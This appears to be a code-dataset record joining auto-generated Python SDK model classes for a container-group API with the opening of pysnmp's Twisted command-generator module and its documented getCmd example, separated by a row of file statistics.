self.flex_volume_options = map.get('FlexVolumeOptions')
self.config_file_volume_config_file_to_paths = []
if map.get('ConfigFileVolumeConfigFileToPaths') is not None:
for k in map.get('ConfigFileVolumeConfigFileToPaths'):
temp_model = DescribeContainerGroupsResponseContainerGroupsVolumesConfigFileVolumeConfigFileToPaths()
temp_model = temp_model.from_map(k)
self.config_file_volume_config_file_to_paths.append(temp_model)
else:
self.config_file_volume_config_file_to_paths = None
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersVolumeMounts(TeaModel):
def __init__(self, name=None, mount_path=None, read_only=None):
self.name = name
self.mount_path = mount_path
self.read_only = read_only
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.mount_path, 'mount_path')
self.validate_required(self.read_only, 'read_only')
def to_map(self):
result = {}
result['Name'] = self.name
result['MountPath'] = self.mount_path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.mount_path = map.get('MountPath')
self.read_only = map.get('ReadOnly')
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersPorts(TeaModel):
def __init__(self, port=None, protocol=None):
self.port = port
self.protocol = protocol
def validate(self):
self.validate_required(self.port, 'port')
self.validate_required(self.protocol, 'protocol')
def to_map(self):
result = {}
result['Port'] = self.port
result['Protocol'] = self.protocol
return result
def from_map(self, map={}):
self.port = map.get('Port')
self.protocol = map.get('Protocol')
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFromFieldRef(TeaModel):
def __init__(self, field_path=None):
self.field_path = field_path
def validate(self):
self.validate_required(self.field_path, 'field_path')
def to_map(self):
result = {}
result['FieldPath'] = self.field_path
return result
def from_map(self, map={}):
self.field_path = map.get('FieldPath')
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFrom(TeaModel):
def __init__(self, field_ref=None):
self.field_ref = field_ref
def validate(self):
self.validate_required(self.field_ref, 'field_ref')
if self.field_ref:
self.field_ref.validate()
def to_map(self):
result = {}
if self.field_ref is not None:
result['FieldRef'] = self.field_ref.to_map()
else:
result['FieldRef'] = None
return result
def from_map(self, map={}):
if map.get('FieldRef') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFromFieldRef()
self.field_ref = temp_model.from_map(map['FieldRef'])
else:
self.field_ref = None
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVars(TeaModel):
def __init__(self, key=None, value=None, value_from=None):
self.key = key
self.value = value
self.value_from = value_from
def validate(self):
self.validate_required(self.key, 'key')
self.validate_required(self.value, 'value')
self.validate_required(self.value_from, 'value_from')
if self.value_from:
self.value_from.validate()
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
if self.value_from is not None:
result['ValueFrom'] = self.value_from.to_map()
else:
result['ValueFrom'] = None
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
if map.get('ValueFrom') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFrom()
self.value_from = temp_model.from_map(map['ValueFrom'])
else:
self.value_from = None
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersPreviousState(TeaModel):
def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
self.state = state
self.detail_status = detail_status
self.exit_code = exit_code
self.start_time = start_time
self.finish_time = finish_time
self.reason = reason
self.message = message
self.signal = signal
def validate(self):
self.validate_required(self.state, 'state')
self.validate_required(self.detail_status, 'detail_status')
self.validate_required(self.exit_code, 'exit_code')
self.validate_required(self.start_time, 'start_time')
self.validate_required(self.finish_time, 'finish_time')
self.validate_required(self.reason, 'reason')
self.validate_required(self.message, 'message')
self.validate_required(self.signal, 'signal')
def to_map(self):
result = {}
result['State'] = self.state
result['DetailStatus'] = self.detail_status
result['ExitCode'] = self.exit_code
result['StartTime'] = self.start_time
result['FinishTime'] = self.finish_time
result['Reason'] = self.reason
result['Message'] = self.message
result['Signal'] = self.signal
return result
def from_map(self, map={}):
self.state = map.get('State')
self.detail_status = map.get('DetailStatus')
self.exit_code = map.get('ExitCode')
self.start_time = map.get('StartTime')
self.finish_time = map.get('FinishTime')
self.reason = map.get('Reason')
self.message = map.get('Message')
self.signal = map.get('Signal')
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersCurrentState(TeaModel):
def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
self.state = state
self.detail_status = detail_status
self.exit_code = exit_code
self.start_time = start_time
self.finish_time = finish_time
self.reason = reason
self.message = message
self.signal = signal
def validate(self):
self.validate_required(self.state, 'state')
self.validate_required(self.detail_status, 'detail_status')
self.validate_required(self.exit_code, 'exit_code')
self.validate_required(self.start_time, 'start_time')
self.validate_required(self.finish_time, 'finish_time')
self.validate_required(self.reason, 'reason')
self.validate_required(self.message, 'message')
self.validate_required(self.signal, 'signal')
def to_map(self):
result = {}
result['State'] = self.state
result['DetailStatus'] = self.detail_status
result['ExitCode'] = self.exit_code
result['StartTime'] = self.start_time
result['FinishTime'] = self.finish_time
result['Reason'] = self.reason
result['Message'] = self.message
result['Signal'] = self.signal
return result
def from_map(self, map={}):
self.state = map.get('State')
self.detail_status = map.get('DetailStatus')
self.exit_code = map.get('ExitCode')
self.start_time = map.get('StartTime')
self.finish_time = map.get('FinishTime')
self.reason = map.get('Reason')
self.message = map.get('Message')
self.signal = map.get('Signal')
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContextCapability(TeaModel):
def __init__(self, adds=None):
self.adds = []
def validate(self):
self.validate_required(self.adds, 'adds')
def to_map(self):
result = {}
result['Adds'] = []
if self.adds is not None:
for k in self.adds:
result['Adds'].append(k)
else:
result['Adds'] = None
return result
def from_map(self, map={}):
self.adds = []
if map.get('Adds') is not None:
for k in map.get('Adds'):
self.adds.append(k)
else:
self.adds = None
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContext(TeaModel):
def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
self.read_only_root_filesystem = read_only_root_filesystem
self.run_as_user = run_as_user
self.capability = capability
def validate(self):
self.validate_required(self.read_only_root_filesystem, 'read_only_root_filesystem')
self.validate_required(self.run_as_user, 'run_as_user')
self.validate_required(self.capability, 'capability')
if self.capability:
self.capability.validate()
def to_map(self):
result = {}
result['ReadOnlyRootFilesystem'] = self.read_only_root_filesystem
result['RunAsUser'] = self.run_as_user
if self.capability is not None:
result['Capability'] = self.capability.to_map()
else:
result['Capability'] = None
return result
def from_map(self, map={}):
self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
self.run_as_user = map.get('RunAsUser')
if map.get('Capability') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContextCapability()
self.capability = temp_model.from_map(map['Capability'])
else:
self.capability = None
return self
class DescribeContainerGroupsResponseContainerGroupsInitContainers(TeaModel):
def __init__(self, name=None, image=None, cpu=None, memory=None, restart_count=None, working_dir=None, image_pull_policy=None, ready=None, gpu=None, volume_mounts=None, ports=None, environment_vars=None, previous_state=None, current_state=None, security_context=None, command=None, args=None):
self.name = name
self.image = image
self.cpu = cpu
self.memory = memory
self.restart_count = restart_count
self.working_dir = working_dir
self.image_pull_policy = image_pull_policy
self.ready = ready
self.gpu = gpu
self.volume_mounts = []
self.ports = []
self.environment_vars = []
self.previous_state = previous_state
self.current_state = current_state
self.security_context = security_context
self.command = []
self.args = []
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.image, 'image')
self.validate_required(self.cpu, 'cpu')
self.validate_required(self.memory, 'memory')
self.validate_required(self.restart_count, 'restart_count')
self.validate_required(self.working_dir, 'working_dir')
self.validate_required(self.image_pull_policy, 'image_pull_policy')
self.validate_required(self.ready, 'ready')
self.validate_required(self.gpu, 'gpu')
self.validate_required(self.volume_mounts, 'volume_mounts')
if self.volume_mounts:
for k in self.volume_mounts:
if k :
k.validate()
self.validate_required(self.ports, 'ports')
if self.ports:
for k in self.ports:
if k :
k.validate()
self.validate_required(self.environment_vars, 'environment_vars')
if self.environment_vars:
for k in self.environment_vars:
if k :
k.validate()
self.validate_required(self.previous_state, 'previous_state')
if self.previous_state:
self.previous_state.validate()
self.validate_required(self.current_state, 'current_state')
if self.current_state:
self.current_state.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
self.validate_required(self.command, 'command')
self.validate_required(self.args, 'args')
def to_map(self):
result = {}
result['Name'] = self.name
result['Image'] = self.image
result['Cpu'] = self.cpu
result['Memory'] = self.memory
result['RestartCount'] = self.restart_count
result['WorkingDir'] = self.working_dir
result['ImagePullPolicy'] = self.image_pull_policy
result['Ready'] = self.ready
result['Gpu'] = self.gpu
result['VolumeMounts'] = []
if self.volume_mounts is not None:
for k in self.volume_mounts:
result['VolumeMounts'].append(k.to_map() if k else None)
else:
result['VolumeMounts'] = None
result['Ports'] = []
if self.ports is not None:
for k in self.ports:
result['Ports'].append(k.to_map() if k else None)
else:
result['Ports'] = None
result['EnvironmentVars'] = []
if self.environment_vars is not None:
for k in self.environment_vars:
result['EnvironmentVars'].append(k.to_map() if k else None)
else:
result['EnvironmentVars'] = None
if self.previous_state is not None:
result['PreviousState'] = self.previous_state.to_map()
else:
result['PreviousState'] = None
if self.current_state is not None:
result['CurrentState'] = self.current_state.to_map()
else:
result['CurrentState'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
result['Args'] = []
if self.args is not None:
for k in self.args:
result['Args'].append(k)
else:
result['Args'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.image = map.get('Image')
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
self.restart_count = map.get('RestartCount')
self.working_dir = map.get('WorkingDir')
self.image_pull_policy = map.get('ImagePullPolicy')
self.ready = map.get('Ready')
self.gpu = map.get('Gpu')
self.volume_mounts = []
if map.get('VolumeMounts') is not None:
for k in map.get('VolumeMounts'):
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersVolumeMounts()
temp_model = temp_model.from_map(k)
self.volume_mounts.append(temp_model)
else:
self.volume_mounts = None
self.ports = []
if map.get('Ports') is not None:
for k in map.get('Ports'):
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersPorts()
temp_model = temp_model.from_map(k)
self.ports.append(temp_model)
else:
self.ports = None
self.environment_vars = []
if map.get('EnvironmentVars') is not None:
for k in map.get('EnvironmentVars'):
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVars()
temp_model = temp_model.from_map(k)
self.environment_vars.append(temp_model)
else:
self.environment_vars = None
if map.get('PreviousState') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersPreviousState()
self.previous_state = temp_model.from_map(map['PreviousState'])
else:
self.previous_state = None
if map.get('CurrentState') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersCurrentState()
self.current_state = temp_model.from_map(map['CurrentState'])
else:
self.current_state = None
if map.get('SecurityContext') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
self.args = []
if map.get('Args') is not None:
for k in map.get('Args'):
self.args.append(k)
else:
self.args = None
return self
class DescribeContainerGroupsResponseContainerGroupsHostAliases(TeaModel):
def __init__(self, ip=None, hostnames=None):
self.ip = ip
self.hostnames = []
def validate(self):
self.validate_required(self.ip, 'ip')
self.validate_required(self.hostnames, 'hostnames')
def to_map(self):
result = {}
result['Ip'] = self.ip
result['Hostnames'] = []
if self.hostnames is not None:
for k in self.hostnames:
result['Hostnames'].append(k)
else:
result['Hostnames'] = None
return result
def from_map(self, map={}):
self.ip = map.get('Ip')
self.hostnames = []
if map.get('Hostnames') is not None:
for k in map.get('Hostnames'):
self.hostnames.append(k)
else:
self.hostnames = None
return self
class DescribeContainerGroupsResponseContainerGroupsDnsConfigOptions(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class DescribeContainerGroupsResponseContainerGroupsDnsConfig(TeaModel):
def __init__(self, options=None, name_servers=None, searches=None):
self.options = []
self.name_servers = []
self.searches = []
def validate(self):
self.validate_required(self.options, 'options')
if self.options:
for k in self.options:
if k :
k.validate()
self.validate_required(self.name_servers, 'name_servers')
self.validate_required(self.searches, 'searches')
def to_map(self):
result = {}
result['Options'] = []
if self.options is not None:
for k in self.options:
result['Options'].append(k.to_map() if k else None)
else:
result['Options'] = None
result['NameServers'] = []
if self.name_servers is not None:
for k in self.name_servers:
result['NameServers'].append(k)
else:
result['NameServers'] = None
result['Searches'] = []
if self.searches is not None:
for k in self.searches:
result['Searches'].append(k)
else:
result['Searches'] = None
return result
def from_map(self, map={}):
self.options = []
if map.get('Options') is not None:
for k in map.get('Options'):
temp_model = DescribeContainerGroupsResponseContainerGroupsDnsConfigOptions()
temp_model = temp_model.from_map(k)
self.options.append(temp_model)
else:
self.options = None
self.name_servers = []
if map.get('NameServers') is not None:
for k in map.get('NameServers'):
self.name_servers.append(k)
else:
self.name_servers = None
self.searches = []
if map.get('Searches') is not None:
for k in map.get('Searches'):
self.searches.append(k)
else:
self.searches = None
return self
class DescribeContainerGroupsResponseContainerGroupsEciSecurityContextSysctls(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class DescribeContainerGroupsResponseContainerGroupsEciSecurityContext(TeaModel):
def __init__(self, sysctls=None):
self.sysctls = []
def validate(self):
self.validate_required(self.sysctls, 'sysctls')
if self.sysctls:
for k in self.sysctls:
if k :
k.validate()
def to_map(self):
result = {}
result['Sysctls'] = []
if self.sysctls is not None:
for k in self.sysctls:
result['Sysctls'].append(k.to_map() if k else None)
else:
result['Sysctls'] = None
return result
def from_map(self, map={}):
self.sysctls = []
if map.get('Sysctls') is not None:
for k in map.get('Sysctls'):
temp_model = DescribeContainerGroupsResponseContainerGroupsEciSecurityContextSysctls()
temp_model = temp_model.from_map(k)
self.sysctls.append(temp_model)
else:
self.sysctls = None
return self
class DescribeContainerGroupsResponseContainerGroups(TeaModel):
def __init__(self, container_group_id=None, container_group_name=None, region_id=None, zone_id=None, memory=None, cpu=None, v_switch_id=None, security_group_id=None, restart_policy=None, intranet_ip=None, status=None, internet_ip=None, creation_time=None, succeeded_time=None, eni_instance_id=None, instance_type=None, expired_time=None, failed_time=None, ram_role_name=None, ipv_6address=None, vpc_id=None, discount=None, resource_group_id=None, tenant_eni_instance_id=None, tenant_vswitch_id=None, tenant_security_group_id=None, spot_strategy=None, tags=None, events=None, containers=None, volumes=None, init_containers=None, host_aliases=None, dns_config=None, eci_security_context=None):
self.container_group_id = container_group_id
self.container_group_name = container_group_name
self.region_id = region_id
self.zone_id = zone_id
self.memory = memory
self.cpu = cpu
self.v_switch_id = v_switch_id
self.security_group_id = security_group_id
self.restart_policy = restart_policy
self.intranet_ip = intranet_ip
self.status = status
self.internet_ip = internet_ip
self.creation_time = creation_time
self.succeeded_time = succeeded_time
self.eni_instance_id = eni_instance_id
self.instance_type = instance_type
self.expired_time = expired_time
self.failed_time = failed_time
self.ram_role_name = ram_role_name
self.ipv_6address = ipv_6address
self.vpc_id = vpc_id
self.discount = discount
self.resource_group_id = resource_group_id
self.tenant_eni_instance_id = tenant_eni_instance_id
self.tenant_vswitch_id = tenant_vswitch_id
self.tenant_security_group_id = tenant_security_group_id
self.spot_strategy = spot_strategy
self.tags = []
self.events = []
self.containers = []
self.volumes = []
self.init_containers = []
self.host_aliases = []
self.dns_config = dns_config
self.eci_security_context = eci_security_context
def validate(self):
self.validate_required(self.container_group_id, 'container_group_id')
self.validate_required(self.container_group_name, 'container_group_name')
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.zone_id, 'zone_id')
self.validate_required(self.memory, 'memory')
self.validate_required(self.cpu, 'cpu')
self.validate_required(self.v_switch_id, 'v_switch_id')
self.validate_required(self.security_group_id, 'security_group_id')
self.validate_required(self.restart_policy, 'restart_policy')
self.validate_required(self.intranet_ip, 'intranet_ip')
self.validate_required(self.status, 'status')
self.validate_required(self.internet_ip, 'internet_ip')
self.validate_required(self.creation_time, 'creation_time')
self.validate_required(self.succeeded_time, 'succeeded_time')
self.validate_required(self.eni_instance_id, 'eni_instance_id')
self.validate_required(self.instance_type, 'instance_type')
self.validate_required(self.expired_time, 'expired_time')
self.validate_required(self.failed_time, 'failed_time')
self.validate_required(self.ram_role_name, 'ram_role_name')
self.validate_required(self.ipv_6address, 'ipv_6address')
self.validate_required(self.vpc_id, 'vpc_id')
self.validate_required(self.discount, 'discount')
self.validate_required(self.resource_group_id, 'resource_group_id')
self.validate_required(self.tenant_eni_instance_id, 'tenant_eni_instance_id')
self.validate_required(self.tenant_vswitch_id, 'tenant_vswitch_id')
self.validate_required(self.tenant_security_group_id, 'tenant_security_group_id')
self.validate_required(self.spot_strategy, 'spot_strategy')
self.validate_required(self.tags, 'tags')
if self.tags:
for k in self.tags:
if k :
k.validate()
self.validate_required(self.events, 'events')
if self.events:
for k in self.events:
if k :
k.validate()
self.validate_required(self.containers, 'containers')
if self.containers:
for k in self.containers:
if k :
k.validate()
self.validate_required(self.volumes, 'volumes')
if self.volumes:
for k in self.volumes:
if k :
k.validate()
self.validate_required(self.init_containers, 'init_containers')
if self.init_containers:
for k in self.init_containers:
if k :
k.validate()
self.validate_required(self.host_aliases, 'host_aliases')
if self.host_aliases:
for k in self.host_aliases:
if k :
k.validate()
self.validate_required(self.dns_config, 'dns_config')
if self.dns_config:
self.dns_config.validate()
self.validate_required(self.eci_security_context, 'eci_security_context')
if self.eci_security_context:
self.eci_security_context.validate()
def to_map(self):
result = {}
result['ContainerGroupId'] = self.container_group_id
result['ContainerGroupName'] = self.container_group_name
result['RegionId'] = self.region_id
result['ZoneId'] = self.zone_id
result['Memory'] = self.memory
result['Cpu'] = self.cpu
result['VSwitchId'] = self.v_switch_id
result['SecurityGroupId'] = self.security_group_id
result['RestartPolicy'] = self.restart_policy
result['IntranetIp'] = self.intranet_ip
result['Status'] = self.status
result['InternetIp'] = self.internet_ip
result['CreationTime'] = self.creation_time
result['SucceededTime'] = self.succeeded_time
result['EniInstanceId'] = self.eni_instance_id
result['InstanceType'] = self.instance_type
result['ExpiredTime'] = self.expired_time
result['FailedTime'] = self.failed_time
result['RamRoleName'] = self.ram_role_name
result['Ipv6Address'] = self.ipv_6address
result['VpcId'] = self.vpc_id
result['Discount'] = self.discount
result['ResourceGroupId'] = self.resource_group_id
result['TenantEniInstanceId'] = self.tenant_eni_instance_id
result['TenantVSwitchId'] = self.tenant_vswitch_id
result['TenantSecurityGroupId'] = self.tenant_security_group_id
result['SpotStrategy'] = self.spot_strategy
result['Tags'] = []
if self.tags is not None:
for k in self.tags:
result['Tags'].append(k.to_map() if k else None)
else:
result['Tags'] = None
result['Events'] = []
if self.events is not None:
for k in self.events:
result['Events'].append(k.to_map() if k else None)
else:
result['Events'] = None
result['Containers'] = []
if self.containers is not None:
for k in self.containers:
result['Containers'].append(k.to_map() if k else None)
else:
result['Containers'] = None
result['Volumes'] = []
if self.volumes is not None:
for k in self.volumes:
result['Volumes'].append(k.to_map() if k else None)
else:
result['Volumes'] = None
result['InitContainers'] = []
if self.init_containers is not None:
for k in self.init_containers:
result['InitContainers'].append(k.to_map() if k else None)
else:
result['InitContainers'] = None
result['HostAliases'] = []
if self.host_aliases is not None:
for k in self.host_aliases:
result['HostAliases'].append(k.to_map() if k else None)
else:
result['HostAliases'] = None
if self.dns_config is not None:
result['DnsConfig'] = self.dns_config.to_map()
else:
result['DnsConfig'] = None
if self.eci_security_context is not None:
result['EciSecurityContext'] = self.eci_security_context.to_map()
else:
result['EciSecurityContext'] = None
return result
def from_map(self, map={}):
self.container_group_id = map.get('ContainerGroupId')
self.container_group_name = map.get('ContainerGroupName')
self.region_id = map.get('RegionId')
self.zone_id = map.get('ZoneId')
self.memory = map.get('Memory')
self.cpu = map.get('Cpu')
self.v_switch_id = map.get('VSwitchId')
self.security_group_id = map.get('SecurityGroupId')
self.restart_policy = map.get('RestartPolicy')
self.intranet_ip = map.get('IntranetIp')
self.status = map.get('Status')
self.internet_ip = map.get('InternetIp')
self.creation_time = map.get('CreationTime')
self.succeeded_time = map.get('SucceededTime')
self.eni_instance_id = map.get('EniInstanceId')
self.instance_type = map.get('InstanceType')
self.expired_time = map.get('ExpiredTime')
self.failed_time = map.get('FailedTime')
self.ram_role_name = map.get('RamRoleName')
self.ipv_6address = map.get('Ipv6Address')
self.vpc_id = map.get('VpcId')
self.discount = map.get('Discount')
self.resource_group_id = map.get('ResourceGroupId')
self.tenant_eni_instance_id = map.get('TenantEniInstanceId')
self.tenant_vswitch_id = map.get('TenantVSwitchId')
self.tenant_security_group_id = map.get('TenantSecurityGroupId')
self.spot_strategy = map.get('SpotStrategy')
self.tags = []
if map.get('Tags') is not None:
for k in map.get('Tags'):
temp_model = DescribeContainerGroupsResponseContainerGroupsTags()
temp_model = temp_model.from_map(k)
self.tags.append(temp_model)
else:
self.tags = None
self.events = []
if map.get('Events') is not None:
for k in map.get('Events'):
temp_model = DescribeContainerGroupsResponseContainerGroupsEvents()
temp_model = temp_model.from_map(k)
self.events.append(temp_model)
else:
self.events = None
self.containers = []
if map.get('Containers') is not None:
for k in map.get('Containers'):
temp_model = DescribeContainerGroupsResponseContainerGroupsContainers()
temp_model = temp_model.from_map(k)
self.containers.append(temp_model)
else:
self.containers = None
self.volumes = []
if map.get('Volumes') is not None:
for k in map.get('Volumes'):
temp_model = DescribeContainerGroupsResponseContainerGroupsVolumes()
temp_model = temp_model.from_map(k)
self.volumes.append(temp_model)
else:
self.volumes = None
self.init_containers = []
if map.get('InitContainers') is not None:
for k in map.get('InitContainers'):
temp_model = DescribeContainerGroupsResponseContainerGroupsInitContainers()
temp_model = temp_model.from_map(k)
self.init_containers.append(temp_model)
else:
self.init_containers = None
self.host_aliases = []
if map.get('HostAliases') is not None:
for k in map.get('HostAliases'):
temp_model = DescribeContainerGroupsResponseContainerGroupsHostAliases()
temp_model = temp_model.from_map(k)
self.host_aliases.append(temp_model)
else:
self.host_aliases = None
if map.get('DnsConfig') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsDnsConfig()
self.dns_config = temp_model.from_map(map['DnsConfig'])
else:
self.dns_config = None
if map.get('EciSecurityContext') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsEciSecurityContext()
self.eci_security_context = temp_model.from_map(map['EciSecurityContext'])
else:
self.eci_security_context = None
return self
class DeleteContainerGroupRequest(TeaModel):
def __init__(self, region_id=None, container_group_id=None, client_token=None):
self.region_id = region_id
self.container_group_id = container_group_id
self.client_token = client_token
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.container_group_id, 'container_group_id')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupId'] = self.container_group_id
result['ClientToken'] = self.client_token
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_id = map.get('ContainerGroupId')
self.client_token = map.get('ClientToken')
return self
class DeleteContainerGroupResponse(TeaModel):
def __init__(self, request_id=None):
self.request_id = request_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
return self
| 37.480004
| 1,142
| 0.625799
| 41,850
| 373,938
| 5.376177
| 0.019403
| 0.031441
| 0.068535
| 0.082243
| 0.784918
| 0.757259
| 0.723378
| 0.701195
| 0.666403
| 0.651091
| 0
| 0.000316
| 0.271195
| 373,938
| 9,976
| 1,143
| 37.483761
| 0.825262
| 0.000136
| 0
| 0.816746
| 1
| 0
| 0.08577
| 0.008043
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108612
| false
| 0.005681
| 0.000114
| 0
| 0.190184
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c51d0684da4363cd6456e177110a64663958ddd4
| 21,212
|
py
|
Python
|
build/piman.app/pysnmp/hlapi/twisted/cmdgen.py
|
jackgisel/team-athens
|
91e2aa810c0064f8b6b39ee53c3b05f037e0aeb0
|
[
"Apache-2.0"
] | null | null | null |
build/piman.app/pysnmp/hlapi/twisted/cmdgen.py
|
jackgisel/team-athens
|
91e2aa810c0064f8b6b39ee53c3b05f037e0aeb0
|
[
"Apache-2.0"
] | null | null | null |
build/piman.app/pysnmp/hlapi/twisted/cmdgen.py
|
jackgisel/team-athens
|
91e2aa810c0064f8b6b39ee53c3b05f037e0aeb0
|
[
"Apache-2.0"
] | null | null | null |
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2019, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysnmp/license.html
#
import sys
from pysnmp.smi.rfc1902 import *
from pysnmp.hlapi.auth import *
from pysnmp.hlapi.context import *
from pysnmp.hlapi.lcd import *
from pysnmp.hlapi.varbinds import *
from pysnmp.hlapi.twisted.transport import *
from pysnmp.entity.rfc3413 import cmdgen
from pysnmp.proto import errind
from twisted.internet.defer import Deferred
from twisted.python.failure import Failure
__all__ = ['getCmd', 'nextCmd', 'setCmd', 'bulkCmd', 'isEndOfMib']
vbProcessor = CommandGeneratorVarBinds()
lcd = CommandGeneratorLcdConfigurator()
isEndOfMib = lambda x: not cmdgen.getNextVarBinds(x)[1]
def getCmd(snmpEngine, authData, transportTarget, contextData,
*varBinds, **options):
"""Performs SNMP GET query.
Based on passed parameters, prepares SNMP GET packet
(:RFC:`1905#section-4.2.1`) and schedules its transmission by
:mod:`twisted` I/O framework at a later point of time.
Parameters
----------
snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
\*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
Returns
-------
deferred : :class:`~twisted.internet.defer.Deferred`
Twisted Deferred object representing work-in-progress. User
is expected to attach his own `success` and `error` callback
functions to the Deferred object though
:meth:`~twisted.internet.defer.Deferred.addCallbacks` method.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
User `success` callback is called with the following tuple as
its first argument:
* errorStatus (str) : True value indicates SNMP PDU error.
* errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
* varBinds (tuple) : A sequence of
:class:`~pysnmp.smi.rfc1902.ObjectType` class instances representing
MIB variables returned in SNMP response.
User `error` callback is called with `errorIndication` object wrapped
in :class:`~twisted.python.failure.Failure` object.
Examples
--------
>>> from twisted.internet.task import react
>>> from pysnmp.hlapi.twisted import *
>>>
>>> def success(args):
... (errorStatus, errorIndex, varBinds) = args
... print(errorStatus, errorIndex, varBind)
...
>>> def failure(errorIndication):
... print(errorIndication)
...
>>> def run(reactor):
... d = getCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
... d.addCallback(success).addErrback(failure)
... return d
...
>>> react(run)
(0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
>>>
"""
def __cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBinds, cbCtx):
lookupMib, deferred = cbCtx
if errorIndication:
deferred.errback(Failure(errorIndication))
else:
try:
varBindsUnmade = vbProcessor.unmakeVarBinds(snmpEngine, varBinds, lookupMib)
except Exception:
ex = sys.exc_info()[1]
deferred.errback(Failure(ex))
else:
deferred.callback((errorStatus, errorIndex, varBindsUnmade))
addrName, paramsName = lcd.configure(
snmpEngine, authData, transportTarget, contextData.contextName)
deferred = Deferred()
cmdgen.GetCommandGenerator().sendVarBinds(
snmpEngine, addrName, contextData.contextEngineId,
contextData.contextName,
vbProcessor.makeVarBinds(snmpEngine, varBinds), __cbFun,
(options.get('lookupMib', True), deferred)
)
return deferred
def setCmd(snmpEngine, authData, transportTarget, contextData,
*varBinds, **options):
"""Performs SNMP SET query.
Based on passed parameters, prepares SNMP SET packet
(:RFC:`1905#section-4.2.5`) and schedules its transmission by
